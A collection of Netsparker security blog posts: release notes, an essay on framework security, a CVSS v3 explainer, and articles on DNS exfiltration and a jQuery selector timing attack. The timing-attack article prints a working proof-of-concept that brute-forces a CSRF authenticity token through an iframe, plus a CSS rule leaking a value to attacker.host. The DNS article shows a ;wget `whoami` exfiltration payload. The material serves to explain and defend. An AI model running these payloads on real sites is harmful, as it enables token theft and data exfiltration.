We're delighted to announce a Netsparker Standard release. The highlights of this release are: a rewritten Sitemap and Issues panes; a new Family Vulnerabilities feature; added support for 64-bit smart card drivers and Swagger 3.0 Importer; and several, new Send To integrations, including GitLab, Bitbucket, Unfuddle and Zapier.

This announcement highlights what is new and improved in this latest update.

Rewritten Sitemap and Issues Panes

We have rewritten the Sitemap and Issues trees, which improves the performance and adds features like filtering, grouping, sorting and searching. This new Sitemap will enhance the user experience and enable greater productivity for Netsparker users.

Rewritten Sitemap and Issues Panes

For further information, see Viewing the Scan Summary Dashboard in Netsparker Standard.

Vulnerability Families

We have added a Vulnerability Families feature, where similar types of vulnerabilities are no longer reported separately. This addresses the issue of multiple reports for some single vulnerabilities. Netsparker will now report a single instance of vulnerabilities detected from the same family.

64-bit Smart Card Driver Support

We have added support for 64-bit smart card drivers for authentication. This is an improvement on our initial 32-bit support.

Send to Integration Additions

We have added Send To implementation which allows users to send the vulnerability details to:

  • GitLab
  • Bitbucket
  • Unfuddle
  • Zapier

Integration Additions

Netsparker Enterprise will also have the same integration.

For further information, see Creating a New Send To Action in Netsparker Standard.

Swagger 3.0 Importer

We have added support for Swagger 3 / OpenAPI link import. This is the new version of Swagger API documentation used for Web Services.

Further Information

For a complete list of what is new, improved and fixed in this update, refer to the Netsparker Standard and Netsparker Enterprise changelogs.


Netsparker Terminates Support for TLS 1.0

$
0
0

Please note that Netsparker will no longer support TLS 1.0, effective 14th of January 2019.

This will affect all HTTPS traffic to Netsparker, including: software updates, the licensing process for Netsparker and vulnerability database updates.

Should you encounter any connection issues please update your settings accordingly.

Contact support@netsparker.com if you require any assistance.

Why Framework Choice Matters in Web Application Security

$
0
0

One of the oldest clichés in web application security is that, "It doesn't matter which framework you choose, if you know what you're doing". In my experienced opinion, off the back of a career in the web security industry, this notion is completely false!

This blog post explains why.

Why Framework Choice Matters

Good Developers Always Develop Secure Applications

Someone could try to write a secure web application using nothing but Brainfuck and enough time and effort. They could implement their own session handling and try to make it as secure as possible. But that sounds ridiculous, right?

When I say somebody could implement their own CSRF protection in PHP, it sounds perfectly normal because that's exactly what everyone keeps doing! However, this is still extremely unwise. In the same way, a secure session implementation should be one of the responsibilities of the framework. A secure CSRF protection implementation shouldn't have to be implemented by the developer.

Security of the Language, Security of the Framework

There is no perfect framework! Every popular framework has had vulnerabilities and the same is true for all popular web applications. But some applications have a better security track record then others and the same goes for frameworks. Apache Struts' OGNL Expression Injection, PHP's various low level vulnerabilities issues and Perl's serious flaws are good examples of these vulnerabilities.

PHP illustrates the point perfectly. The language itself has very many vulnerabilities, such as Zend_Hash_Del_Key_Or_Index Vulnerability or month of PHP bugs. Think about it. Even if the developer knew how to navigate around PHP's countless pitfalls, the application will still be vulnerable if there is a vulnerability in PHP itself. This is without mentioning the terrible design issues such as PHP type juggling or PHP object injection.

If you set a directory as protected and if your framework can't protect you because the attacker used a different HTTP Method, then that's not the developer's fault, it's framework's fault. That's why frameworks matter, because even if you build the most secure application, when your framework is vulnerable, so is your application.

Ask yourself these questions about your framework:

  • Does your framework handle unicode characters correctly?
  • Are functions unexpectedly affected by null bytes?
  • Does it spill out sensitive data when you send one special character in a cookie?

All of these are problems concerning the framework – not your application. Choose a framework with a good security track record. Otherwise you'll have to read the source code of your application and that of the framework, including all its exposed API endpoints, the internal functions you call and the functions your framework calls each time a user issues a request (e.g. routing).

Framework Specific Issues

See? Framework-specific problems matter.

Secure by Default

There are frameworks that approach the design of certain functionality from a 'secure by default' angle. It's quite rare to see HTTP Header Injection (CRLF/HTTP Response Splitting) problems in ASP.NET for example. That's because by default all related .NET functions will refuse to accept new lines. You really have to go out of your way as a developer in order to introduce this vulnerability. However, you would be surprised how creative some developers can be when it comes to introducing vulnerabilities. The irresistible urge of some developers to introduce vulnerabilities previously thought to be impossible is something even the best framework can't fix. Sorry, but that's the truth.

Framework developers themselves are even prone to this phenomenon. The best example is Magic Quotes in PHP. An insane number of applications were vulnerable due to them, that's how much of a mess it was. It shouldn't have been there in the first place, that's why they eventually decided to deprecate it.

Inbuilt Security Features

I think every decent developer knows that rolling your own crypto is idiotic, yet somehow it's OK for developers to roll their own CSRF protection, SQL Injection filter, XSS protection library, for example. And if you ask any penetration tester worth their salt, they'll assure you that these developers keep failing miserably.

Here are the questions are your need to ask of your framework:

  • Does it support parameterized SQL Queries (prepared statements)?
  • Does it provide a way to separate data and the HTML and carry out the required encoding based on the output location in order to prevent Cross Site Scripting vulnerabilities?
  • Does it provide a secure session implementation?
  • Does it provide a secure authentication mechanism?
  • Does it provide a secure way to execute OS commands? (separating parameters and the executable to avoid injections just like parameterized SQL Queries)
  • Does it provide secure storage options? And path normalization functions?
  • Does it provide a way to avoid email header injections?
  • Is there any function which can protect against new line injections to write safe logs?
  • Is there an inbuilt feature that will apply whitelisting on inputs?

I could go on, but you got the point. Unfortunately there is hardly a single framework that is completely secure by default. However, those whose developers who care about making the framework secure by default deserve more of our trust. This also means that you shouldn't trust a framework that leaves most of the points above to the user, or makes it hard to use them correctly, even if it's easier to use while you use it for development.

Documentation, Culture and Sample Code

Documentation and culture around a framework are also pretty important. Take a look at some older Tomcat JSP and IIS 6 ASP examples. Incredibly, all of them have several serious vulnerabilities out of the box. Apparently it's not enough to write vulnerable sample applications, they even need to be deployed automatically during setup so your environment can be vulnerable by default...

For example, many examples in the .NET documentation use parameterized SQL Queries, which sounds great, but the .NET documentation contains so many other flaws and terrible code snippets.

Many vendors have terrible documentation and neglect to provide secure code snippets. In order to increase clarity in the examples, some code samples have been stripped of important security and error checks.

Finally, when it comes to culture, there are other factors to consider. Let's take Perl as an example. You can see more OS Command Injections in Perl applications than possibly any other framework – because that's how most Perl guys roll. Pass it to an OS command, parse the output and print it to the screen. This is a quite rare practice in many other frameworks* but the Perl community seems to embrace it.

Required Time, Effort and Knowledge for a Secure Application

All of these factors affect the required time, effort and security knowledge necessary to develop a secure web application. If the framework provides built-in security for CSRF with one line of code, this immediately decreases the complexity of the application, and the required time for development and testing. Also, developers don't need to be security experts in order to implement such a check, which makes it easier for beginners to write secure applications.

Or do you really think a junior developer would know that it's possible carry out Cross Site Request Forgery attacks against a web service? Believe me they don't! They also lack a lot of knowledge about the history of application security, such as that it was possible to execute JavaScript code from within  CSS, which would make them more careful when user input is used inside style sheets. They don't know that they need to mark cookies as secure. They don't know you can bypass many clever XSS protections by using freely available tools such as BeEF. They often know nothing about security especially when it comes to edge cases. Many developers may never know or understand all these issues. This is why why the selected framework should care of this stuff.

Frameworks Matter In Web Application Security

Let's be honest. There's no perfect framework and there won't be one anytime soon, though we're getting there. Right now, the best solution is to choose the best framework available.

The frameworks I'm most familiar with are PHP, ASP and ASP.NET, where my examples come from. There are many other frameworks such as Ruby on Rails or Struts from which you can observe similar benefits or framework-specific problems.

* Although I need to note that due to many other configuration requirements that task might not be that easy in some frameworks hence not that popular. For example .NET might require several permissions to properly run an executable from an ASP.NET script.

** OK, they need to know about "Secure Cookies" but funny enough many of them still don't. So why not mark all cookies set over SSL as secure and when their code doesn't work they can fix(!) it, at least this way it'll be secure by default and maybe developers will ask themselves "What the hell is a secure cookie? and why would I need it?"

Acquiring Data with CSS Selectors and Javascript on Time Based Attacks

$
0
0

jQuery is a JavaScript library that was released in August 2006 with the motto: 'write less, do more'. jQuery simplifies the process of writing code in JavaScript by making the element selectors, event chaining and handling easier. It’s safe to say that since the release of jQuery, a large number of client-based libraries have a defacto dependency on jQuery. In this article, we discuss the research on jQuery selectors and how they can be used as an attack vector in order for hackers to acquire data.

Stealing Data with CSS Selectors and JavaScript | Netsparker

First, we should note that the same method is possible with document.querySelector and CSS selectors. However, since the research we’re quoting on this article has a proof of concept on jQuery, we’re giving the details of this attack on jQuery selectors.

Examples of What You Can Do With jQuery Selectors

There are various uses for jQuery selectors. jQuery selectors help you call one or more HTML elements, classes, IDs, attribute values, and element indexes. For example, with this jQuery selector, you can choose the element with the 'username' ID:

$("#username")

or

jQuery("#username)

Similarly, you can use the related class value instead of the ID when you’re selecting an element. This code chooses all the elements with the formItem class:

$(".formItem")

or

jQuery(".formItem")

It is also possible to make a selection using element attributes in jQuery. For example, we can choose all the inputs that have their type set as 'password' with this code:

jQuery("input[type='password']")

jQuery makes it possible to use multiple selectors at once. For instance, we can use this selector to choose all the elements that have their type set as 'text', and are of the formElement class:

jQuery(".formElement[type='text']")

jQuery also allows the use of startWith and contains operators as attribute selectors. For example the input[value^='x'] selector will choose all the inputs whose value begins with 'x'.

jQuery(location.hash)

Using URLs, we can let the web know what we’re requesting, where we’re requesting it from, as well as the relevant privileges.

The fragment (also known as the anchor) of the URL is the part that comes after the hash (#). The HTML element that carries the fragment ID has the ability to scroll on the page. When a request is made to the URL below, the page will scroll down to the appropriate fragment corresponding to the the ID attribute.

https://www.example.com/#contactForm

Example of a Timing Attack Using Multiple jQuery Selectors

We've stated that it is possible to use more than one jQuery selector at once. Now we’ll share a wonderful trick.

If you execute the following code on your browser’s console (Ctrl-Shift-K or Ctrl-Shift-J), you’ll see that it produces a delayed result:

$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) body")

Now execute the following code:

$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) body[noAttribute='noExist']")

Since the page doesn’t have an element with a noAttribute attribute as 'noExist', the command will result without a delay. Why did the first command take so long but the second one happened immediately?

Evaluation of Element Selectors From Right to Left

This is when the trick with the selectors comes into play. Since the element selectors are evaluated from right to left, the selector dismissed the rest of the command when it realized that the page didn’t have a body element that matched the noAttribute attribute with a 'noExist' value.

Why do browsers behave this way? We can reply to this with a quote from CSS Trick from Stack Overflow:

… in the situation the browser is looking at most of the selectors it's considering don't match the element in question. So the problem becomes one of deciding that a selector doesn't match as fast as possible; if that requires a bit of extra work in the cases that do match you still win due to all the work you save in the cases that don't match.

The browser visits all the DOM  elements after you execute the selector command. If it begins to visit each element from left to right, it would search for all input elements, then it would have to control whether the remaining elements had the formItem class or not.

However, if the comparison process is carried out from right to left, it would only take those elements that have the formItem class, and afterwards choose only those that have the input type. Since the defining selector is the final one, the right-to-left comparison process would be much faster. Considering this, we can acquire data from webpages using time-based attacks.

The Difference between Timing Attacks and Boolean Based Attacks

Hackers can extract data from a server by using CSS selectors with the Boolean-based method. In this way, they can request resources from a server under their control. However, there was the obligation for the element to support CSS attributes like background/background-image, list-style/list-style-image.

<style>
   #username[value="mikeg"] {
           background:url("https://attacker.host/mikeg");
   }
</style>
<input id="username" value="mikeg" />

An advantage of the method in this article is that it doesn’t have a similar constraint. Using this method, you can use this code to obtain an authentication token:

*:has(:has(:has(*)) :has(*) :has(*)) input[name=authenticity_token][value^='x']

Measuring the Elapsed Time in the Timing Attack

How can we measure the elapsed time, since our attack is time-based? Eduardo Vela, writing in 2014, provides an explanation. He states that we can measure the elapsed time in time-based attacks. In the situations in which the attacker and the victim's websites work on the same thread, the loading that takes a while on the victim website will slow down a process on the attacker’s website, allowing the attacker to measure the elapsed time.

Details of The Timing Attack Exploit

The attacker loads the victim website within an iframe. He specifies a function that will work later (callback) using the setTimeout function. He then makes a request on the victim's website using the hash selector. Since the result of the hashchange handler will take time, callback will be delayed, and this will be measured by the window.performance.now function:

<script>
           const WAIT_TIME = 6;
           const VICTIM_URL = "https://labs.sheddow.xyz/fsf.html";

           const wait = ms => new Promise(resolve => setTimeout(resolve, ms));

           function get_execution_time(selector) {
               var t0 = window.performance.now();

               var p = wait(WAIT_TIME).then(_ => Promise.resolve(measure_time(t0)))

               window.frames[0].location = VICTIM_URL + "#x," + encodeURIComponent(selector) + ","+Math.random();
               
               return p;
           }

           function measure_time(t0) {
               var t = window.performance.now() - t0;
               return t;
           }


           const SLOW_SELECTOR = "*:has(*:has(*) *:has(*) *:has(*) *:has(*))";
           const SELECTOR_TEMPLATE = "input[name=authenticity_token][value^='{}']";

           async function binary_search(prefix, characters) {
               console.log("Testing '" + characters + "'");
               if (characters.length == 1) {
                   return characters[0];
               }

               var mid = Math.floor(characters.length/2);
               var s1 = make_selector(prefix, characters.slice(0, mid));
               var s2 = make_selector(prefix, characters.slice(mid, characters.length));

               var t1 = await get_execution_time(s1);
               var t2 = await get_execution_time(s2);

               if (approximately_equal(t1, t2)) {
                   return null;
               }
               else if (t1 < t2) {
                   return binary_search(prefix, characters.slice(mid, characters.length));
               }
               else {
                   return binary_search(prefix, characters.slice(0, mid));
               }
           }

           function make_selector(prefix, characters) {
               return characters
                   .split("")
                   .map(c => SLOW_SELECTOR + " " + SELECTOR_TEMPLATE.replace("{}", prefix + c))
                   .join(",");
           }

           function approximately_equal(t1, t2) {
               var diff = Math.abs(t1 - t2);
               return diff <= 0.2*t1 || diff <= 0.2*t2;
           }

           const BASE64_CHARS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/";
           const TOKEN_LENGTH = 43;

           async function bruteforce_token() {
               var backtracks = 0;
               var t0 = window.performance.now();
               var misses = 0;
               var token = "";
               while (token.length < TOKEN_LENGTH) {
                   var c = await binary_search(token, BASE64_CHARS);
                   if (c === null) {
                       misses++;
                       if (misses == 3) {
                           token = token.slice(0, -1); // Backtrack
                           backtracks++;
                       }
                   }
                   else {
                       token += c;
                       misses = 0;
                   }
                   document.getElementById("token").innerHTML = token;
                   document.getElementById("percent").innerHTML = Math.round(100*token.length/TOKEN_LENGTH) + "%";
               }
               token += "=";
               document.getElementById("token").innerHTML = token;
               var elapsed = window.performance.now() - t0;
               return {token, elapsed, backtracks};
           }

           window.onload = function() {
               if (location.search === "?attack") {
                   bruteforce_token().then(({token, elapsed, backtracks}) => {
                       wait(0).then(_ => alert("Found " + token + " in " + elapsed/1000 + " seconds with " + backtracks + " backtracks"));
                   });
               }
           }
       </script>

<body>
       <iframe src="https://labs.sheddow.xyz/fsf.html"></iframe>
       <div class="box" id="token"></div>
       <div class="box" id="percent"></div>
</body>

Preventing the Time Based Attack

This attack used iframe, which may lead some to assume that setting the X-Frame-Options header will prevent the website from loading in an iframe, and therefore avoid an attack altogether. But this isn’t the case, because the attacker can perform the same operations using window.open and delay callback.

We've already mentioned that the timing attack is possible only if the attacker and the victim's websites work on the same thread. But, what if the websites work on different threads? In that case, you can only block the exploit using site isolation. Site Isolation is a new feature introduced in Chrome 63. It means that websites with different origins are forced to work as separate processes regardless of the tabs or iframes.

Some Final Points on Site Isolation

Site isolation is disabled by default in Chrome 63 and above. You have to visit chrome://flags/#enable-site-per-process to enable site isolation. You must also restart your browser immediately after changing this setting. You can enable site isolation for specific origins, too. You can use the parameter below to do this when you launch Chrome:

--isolate-origins=https://google.com,https://youtube.com

The following site isolation bugs have been confirmed by the vendor:

  • If site isolation is enabled across all websites, an extra 10-20% of performance overhead is added. The feature may be enabled on certain websites to decrease the overhead.
  • The iframes that load different origins look blank on the printed HTML page.
  • In some cases, clicking and scrolling doesn’t work as expected in iframes with different origins.

Headers are Ineffective Against Unique Attack Vectors

In this article, we observed the use of jQuery element selectors and their role in a timing attack that was discovered by Sigurd Kolltveit. We shared the research of Eduardo Velo who blogged about an innovative method of measuring time-based attacks. Sometimes headers aren’t enough against unique attack vectors as discussed, and users have to take additional precautions such as enabling site isolation.

Further Reading

For further information on the research on jQuery selectors and how they can be used as an attack vector to acquire data, see sheddow's blog post, A timing attack with CSS selectors and Javascript.

DNSFS: Is it Possible to Use DNS as a File System?

$
0
0

In the world of information security and privacy, Domain Name System (DNS) requests present a problem. Not only are they unencrypted by default, making it easy for anyone to intercept and modify them, but attackers have also used them in order to amplify Distributed Denial of Service (DDoS) attacks.

Using the DNS as a File System

Attackers can do this because DNS uses User Datagram Protocol (UDP) for packet sizes of up to 4096 bytes, and the lack of the TCP's three-way handshake makes it easy to spoof the source IP address. This means that attackers can send relatively small requests to the DNS server, which in turn sends much bigger responses to the spoofed IP address. But this is not the only headache with DNS.

Can Outgoing DNS Requests Not Simply Be Blocked?

If you are serious about online security, you need to use a robust firewall in order to block certain incoming and outgoing requests. That means if you are running a website on a VPN, there is no need to expose its Secure Shell (SSH) service to anyone connecting to it.

  • In addition, if your application doesn't need to send outgoing HTTP requests to other servers, it's good practice to block those too. In production, any negative side effects of these restrictions will be almost imperceptible.
  • However, blocking outgoing DNS requests is a totally different matter. Everything sends DNS queries, ranging from your system and application updates, to your backup system, as well as your web and proxy servers. It is not always possible to whitelist these outgoing requests, so outgoing DNS queries are often not restricted by the firewall.

Exfiltrating Data Over DNS

All this explains why penetration testers – and malicious hackers – love to resort to the DNS protocol for data exfiltration. Let's say there is a command injection on a web application, but HTTP requests are blocked. A payload that exfiltrates the data might look like this:

;wget `whoami`.example.com

First, `whoami` will convert to the current user. In the case of Apache web servers, this user is most likely www-data. The command will look like this after it's expanded:

;wget www-data.example.com

wget will send a DNS request, asking for the IP of the subdomain www-data on example.com. Then, example.com's nameserver will log the above DNS request. Even though the subsequent HTTP request may fail, the attacker is still able to extract the data over DNS. This is not an ideal way to exfiltrate your data. While there are hardly any restrictions for HTTP post requests when it comes to sending data, DNS data extraction is much more complicated.

Should We Use DNS or HTTP for Data Extraction?

The reason why you should never prefer data extraction via DNS, when you can use HTTP, is simple. In DNS requests, Fully Qualified Domain Names (FQDNs) are limited to 253 characters, not all of which can be used for data exfiltration.

Let's say you own the domain attacker.com. This already consists of twelve characters. Then you need to add a dot to separate the subdomains, which is another extra character. After that you can send the actual data, but because you need to avoid most special characters, you need to use encoding. Let's say you use hex encoding. This means the size of the data you want to exfiltrate effectively doubles. The parts of the FQDN that are separated by dots are called labels, and each of them must be no longer than 63 characters, containing only letters, digits and hyphens.

So .attacker.com is 13 characters long. Let's see how many characters we can extract.

So .attacker.com is 13 characters long. Let's see how many characters we can extract.

Let's ignore the attacker.com domain name and all the separating dots. What we are left with is 48 + (3 * 63), or in other words 237 characters. If we use hex encoding, we will have an even number of bytes, which means that we have 236 characters left for extraction (if we don't want to split one encoded byte across two different messages). However, the actual number of characters is exactly half of that after decoding, so we can extract 118 bytes per request. This means that we need exactly 8475 messages per megabyte of data.

What comes to mind when you read how incredibly inconvenient it is to send large amounts of data using DNS requests? Of course! Storing files in DNS server caches! Confused? Let me explain...

Is DNSFS Really A DNS-Based File System?

A while ago, Ben Cox was testing to see how long some DNS resolvers actually keep DNS records in their cache. It turned out that some of them were storing the data for up to one week. Ever since he wrote a blog post about his findings, he was curious about whether or not he could use this behaviour to store files in the caches of DNS resolvers.

  • He first had to scan the internet for open DNS resolvers. When he was finished, he had amassed quite a large list. After waiting for ten days, in order to weed out the resolvers running on dynamic IP addresses, he was still left with many open resolvers.
  • He then wrote the DNSFS (DNS File System) – a tool that allows him to store files in DNS records. This is how it works. Let's assume he owns the hostname dnsfs.ns on which he runs the DNSFS tool. If he wants to store the file names.txt, he can use an open resolver to query some-subdomain.dnsfs.ns. The DNSFS tool will then in turn return a base64-encoded version of the file in a .txt record, with the TTL set to 68 years. After that, the file is deleted from the DNSFS memory.
  • The user can now use DNSFS to query the resolver again and retrieve the file from the cached TXT record. However, if the user wants to store larger files, it is split into parts of 180 bytes each, and is stored in different TXT records.

If you're wondering whether this actually works, check out his blog post (linked above) where you can see it tool in action. He was able to use this technique to store one of his previous blog posts on different DNS servers. But, as tempting as it sounds, please don't store your tax records on open DNS resolvers, as this storage method is highly unreliable!

Netsparker Security Researchers

Ziyahan Albeniz
Sven Morgenroth

New Vulnerability Families Feature

$
0
0

Netsparker is pleased to announce a new feature. It relates to how vulnerabilities are reported and will reduce the number of reported vulnerabilities, saving you time on the resources needed to address them. It also makes scan reports more relevant and accurate.

What is the Vulnerability Families Feature?

Previously Netsparker products reported every single vulnerability that a scan found in a URL. For example, if Netsparker detected Error-based, Blind and Boolean-based SQL Injections in the same URL, each vulnerability would be reported separately. This unnecessarily complicated the scan reports for those sites with many URLs.

With this latest update, Netsparker will group similar vulnerabilities together for reporting and fixing purposes. These groups are known as families, in which vulnerabilities are prioritised based on their exploitability.

  • If an endpoint is vulnerable to similar versions of the same vulnerability, only the most relevant and easy to exploit vulnerabilities will be reported.
  • Once one fix has been completed, this will address the three or four vulnerabilities in the 'family'.

What are the Benefits of the Vulnerability Families Feature?

The new vulnerability families feature will make scan reports shorter and simpler. The quality of vulnerability reporting is by far more important than the mere quantity of reported vulnerabilities, if these are repetitions and false positives. Vulnerability reports are now even more direct and to the point.  

In addition, this new feature will save the time of fixing each iteration of each type of vulnerability, enabling you to deliver fixes that have much more impact.

CVSS: Characterizing and Scoring Vulnerabilities

$
0
0

The impact of potential vulnerabilities on our hardware and software increases significantly as our daily activities become more digitized. Preventing these vulnerabilities requires us to know how they work. But we also need an assessment mechanism to evaluate their criticality. The existence of varying web application vulnerability detection products in the field further complicates the standardization process involved in identifying and determining their severity ranking.

CVSS: Characterizing and Scoring Vulnerabilities

Sun Tzu, naturally, has something to say on the matter of enemies in The Art of War:

If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.

The Common Vulnerability Scoring System (CVSS) was developed in 2005 to fix the lack of standardization in the industry. CVSS is an open, independent and large-scale vulnerability scoring system that categorizes vulnerabilities. By using CVSS to categorize and grade vulnerabilities, it became possible to produce a vectoral string and score, which can be used in other vulnerability management systems.

In this article, we take a closer look at the details of the current CVSS version 3.0, and provide examples of a few vulnerability assessments from a web application security perspective.

Characterizing Vulnerabilities

In CVSS v3, vulnerabilities are characterized under 3 metric groups:

  1. Base
  2. Temporal
  3. Environmental

Let's examine each by defining the additional metrics they use.

Base Score

Base metrics focus on the inherent qualities of a vulnerability that will not change in time, or depend on the environment.

The base score has two subscores: Exploitability and Impact. We can include two virtual categories among these subscores as we analyze the base metric group: Vulnerable Component and Impacted Component. The Scope value states whether the Vulnerable and Impacted Components are the same or not, and defines whether a vulnerability on a part of the system can affect the rest of the system, by allowing the attacker to use the vulnerability to escape the scope of the vulnerability and access the rest of the system.

Leaving aside the exceptional situations listed below, Vulnerable Component and Impacted Component are the same. The exceptions are:

  • XSS vulnerability in a web application: Even though the web application would technically be the vulnerable component in this case, the browser is evaluated as an Impacted Component. This is because the confidentiality, integrity and availability of the browser will be impacted, since the XSS vulnerability will allow the attacker to steal private information and execute scripting code on the browser.
  • Sandbox escape: Sandbox is a testing environment where we isolate applications or hardware to prevent them from spreading. In the event of a leak, the applications nearby will not be affected, escaping the sandbox.

Outside these two virtual categories, CVSS v3 handles the Base Score in two categories: Exploitability and Impact. While Exploitability grades the easiness of exploiting and the necessity of tools for exploiting the vulnerability, Impact defines the results of a potential exploit. Each is outlined below.

Exploitability Metrics

Exploitability metrics define the simplicity of exploiting the vulnerable component.

Attack Vector (AV): Where the Attack Originates From

Network (N): The Vulnerable Component may be exploited remotely, over the network.
Adjacent Network (A): The Vulnerable Component may be exploited from the same physical or logical network.
Local (L): The Vulnerable component may be exploited from a local authorized session, without the need of a network.

Physical (P): The Vulnerable component may be exploited only through physical access to the component. This attack vector was introduced in CVSS v3.

Attack Complexity (AC): Skills Required

Low (L): The vulnerability may be exploited with no additional skills.
High (H): The vulnerability may be exploited with additional tools, conditions and skills.

Privileges Required (PR)

This metric was named 'Authentication (AU)' in CVSS v2 and it defines the necessity of privileges in order to exploit a vulnerability.

None (N): The attacker does not need any privileges to exploit the vulnerability.
Low (L): The attacker is required to have basic privileges in a system to exploit the vulnerability.
High (H): The attacker has to have higher privileges in a system to exploit the vulnerability. The necessity of higher privileges might seem contradictory but the vulnerable component and impacted component might be different.

User Interaction (UI)

None (N): The vulnerability may be exploited without the need for a user interaction.
Required (R): The vulnerability may be exploited if the user takes some action. For example, for the successful exploitation of a CSRF attack, the attacker should induce the victim to click on an external link or visit a certain webpage.

Scope (S)

This metric defines whether the Vulnerable Component and the Impacted Component are the same or not.

Unchanged (U): The Vulnerable Component and the Impacted Component are the same.
Changed (C): The Vulnerable Component and the Impacted Component are different. For instance, as stated in the XSS example we gave above, the vulnerable component is the web application, and the impacted component is the web browser.

Impact Metrics

The Impacted Component is evaluated based on the damage the attack might do to confidentiality (C), integrity (I), and availability (A).

Confidentiality (C)

This metric measures the impact of the exploited vulnerability on the confidentiality of the information within the system.

High (H): A large portion of the resources in the system can be acquired on exploitation of the vulnerability.
Low (L): A small portion of the resources in the system can be acquired on exploitation of the vulnerability.
None (N): The confidentiality of the resources in the system is not lost on exploitation of the vulnerability.

Integrity (I)

This metric measures the impact of the vulnerability exploit on the integrity and veracity of the resources.

High (H): All components can be modified or lost due to the vulnerability.
Low (L): Data can be modified but will not have a severe effect on the impacted component. The attacker does not have control over the consequences of the data modification.
None (N): There’s no loss of protection on the impacted component.

Availability Impact (A)

This metric measures the accessibility to the impacted component after the successful exploit of a vulnerability.

High (H): The access to the system is entirely denied, or there might be some loss of availability that heavily affects the Impacted Component.
Low (L): The access to the system isn’t completely denied but there are partial denials.
None (N): The system is not affected in terms of accessibility.

Temporal Score

Temporal metrics measure how the vulnerabilities are exploited, and how they may be fixed. For example, if a patch is released, the Temporal Score of the vulnerability will decrease. If a new method of exploiting the vulnerability is discovered, this score will increase. Temporal score also depends on the way the vulnerability exploit is reported. The score of the information found within these reports will affect the overall Temporal Score.

As indicated in the metric values below, unlike the Base Score, the Temporal Score changes over time.

Exploit Code Maturity (E)

The Exploit Code Maturity metric measures the probability of exploiting the vulnerability.

Not Defined (X): This will not change the score. It means that the metric is skipped from the scoring.
High (H): No exploit is required, or an effective exploit code is delivered autonomously.
Functional (F): Exploit codes are available. Exploitation of the vulnerability can be repeated using these codes.
Proof-of-Concept (P): Exploiting the vulnerability isn’t simple for most systems. The attacker has to demonstrate extra modifications.
Unproven (U): No exploit codes are available.

Remediation Level (RL)

This metric measures the existence of remedial actions for a vulnerability. Generally, vulnerabilities are unpatched in their initial release.

Not Defined (X): This will not change the score. It means that the metric is skipped from the scoring.
Unavailable (U): There is no solution available.
Workaround (W): There are unofficial methods of patching the vulnerability.
Temporary Fix (T): There is an official but temporary solution.
Official Fix (O): There’s a solution released by the vendor.

Report Confidence (RC)

The Report Confidence metric measures the amount of details in the vulnerability report and their credibility.

Not Defined (X): This will not change the score. It means that the metric is skipped from the scoring.

Confirmed (C): The vendor has confirmed the existence of the vulnerability or the public functional exploit. There are detailed reports to verify the research of the vulnerability.
Reasonable (R): There are important details available, but the source code isn’t open to public access, so the research cannot be verified.
Unknown (U): The report only states that the vulnerability exists. Causes or effects are not reported.

Environmental Score

Generally, Base and Temporal scores are used by people like security analysts and developers who are informed about the vulnerability characteristics. Environmental scores, on the other hand, are used by organizations as end users who evaluate the effects of the vulnerability on the environmental context.1

Environmental scores measure the impact of the vulnerability characteristics, defined with the Base score on the given context, such as an organization’s department.

For example, normally when the Base score is calculated, Confidentiality, Integrity, and Availability are three independent, equal values.2 However in some situations or systems, Availability might be far more important than the others. In that case, the value of Availability in the score can be assigned a greater factor.

Another example is that when the exploitation of a vulnerability requires authorization, the environmental condition might not require authorization. Therefore, the Privileges Required metric will be given the value None, increasing the overall score of the vulnerability.

Calculation

The JavaScript library published on the First website of can be used to calculate CVSS v3 scores.3

Calculating Base Scores

First the Impact Subscore Base (ISC Base) value is calculated:

ISCBase = 1 - ((1−ImpactConf) × (1−ImpactInteg) × (1−ImpactAvail))

Next, depending on whether the scope changes or not, Impact Subscore (ISC) is calculated with two different methods:

 // Calculate ISC
if(Scope=="U") {  // U=Unchanged
  ISC = 6.42 * ISCBase;
} else {
  ISC = 7.52 * (ISCBase-0.029)-3.25*Math.pow((ISCBase-0.02), 15);
}

Then the Exploitability Subscore (ESC) is calculated:

ESC = 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UserInteraction

After the calculations of ISC and ESC, it’s time to calculate the Base Score

If the ISC value is 0, the Base Score is 0, too. If ISC value is 0 or greater we enter this code:

if(ISC<=0) {
BaseScore=0;
} else {
if($("#S").val()=="U") {
BaseScore = roundUp1(Math.min((ISC+ESC),10));
} else {
BaseScore = roundUp1(Math.min((1.08*(ISC+ESC)),10));
}
}

The roundUp1 function should catch your attention. Here’s the description of it in the specifications:

function roundUp1(d) {
 return Math.ceil (d * 10) / 10;
}

After finding the Base Score, we can calculate Temporal Score with the following formula:

Round up(BaseScore × ExploitCodeMaturity × RemediationLevel × ReportConfidence)

CVSS Vector String

CVSS vector strings are the textual representations of the CVSS scores. They are a useful way to demonstrate and store the CVSS scores. CVSS vector strings begin with the CVSS tag, followed by the numeric CVSS version used in the scoring. Following this is the forward slash (/), the metrics and their values.

The metrics can be specified in any order in a vector string. However, the preferred order is given in the table below.

Another rule is that the Base metrics must take place in the strings, but the listing of Temporal and Environmental metrics depend on the preference of the user.

The optional group metrics not specified in the CVSS vector string will be considered as Not Defined (X). The metrics that are specifically given the Not Defined (X) value do not have to appear in the CVSS vector string.

For example:

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

In the vector string above, where Temporal and Environmental metric groups aren’t set, the following metrics and values are given:

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: High
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: Low
  • Integrity: Low
  • Accessibility: None

Every Temporal and Environmental metric not stated above will be considered as Not Defined (X).

For example:

CVSS:3.0/S:U/AV:N/AC:L/PR:H/UI:N/C:L/I:L/A:N/E:F/RL:X

In this example, Exploitability Mature (E) is given the Functional (F) value, and the Remediation Level (RL) is given the Not Defined (X) value. There’s no particular order of the list of metric values.

Example Score Calculation

We can demonstrate a sample score calculation for a vulnerability by using CVSS v3.0. The GNU Bourne-Again Shell (Bash) 'Shellshock' Vulnerability (CVE-2014-6271) vulnerability, which affected many Linux based servers in 2014, is ideal as an example.4

Example Score Calculation

